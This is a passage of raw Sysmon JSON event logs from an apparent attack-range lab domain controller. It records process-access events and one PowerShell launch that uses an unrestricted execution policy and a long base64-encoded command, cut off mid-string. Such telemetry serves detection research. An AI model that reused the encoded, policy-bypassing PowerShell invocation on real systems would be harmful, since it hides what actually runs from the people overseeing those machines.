C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4367,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4368,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4369,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.048\r\nSourceProcessGUID: {41C8662E-20BB-5F25-0000-001091620600}\r\nSourceProcessId: 1232\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-0010DB640600}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.048","SourceProcessGUID":"{41C8662E-20BB-5F25-0000-001091620600}","SourceProcessId":"1232","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-0010DB640600}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4370,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.067\r\nProcessGuid: {41C8662E-20BB-5F25-0000-0010AE650600}\r\nProcessId: 2176\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BB-5F25-0000-0020E0610600}\r\nLogonId: 0x661E0\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-20BB-5F25-0000-0010DB640600}\r\nParentProcessId: 4908\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.067","ProcessGuid":"{41C8662E-20BB-5F25-0000-0010AE650600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASAB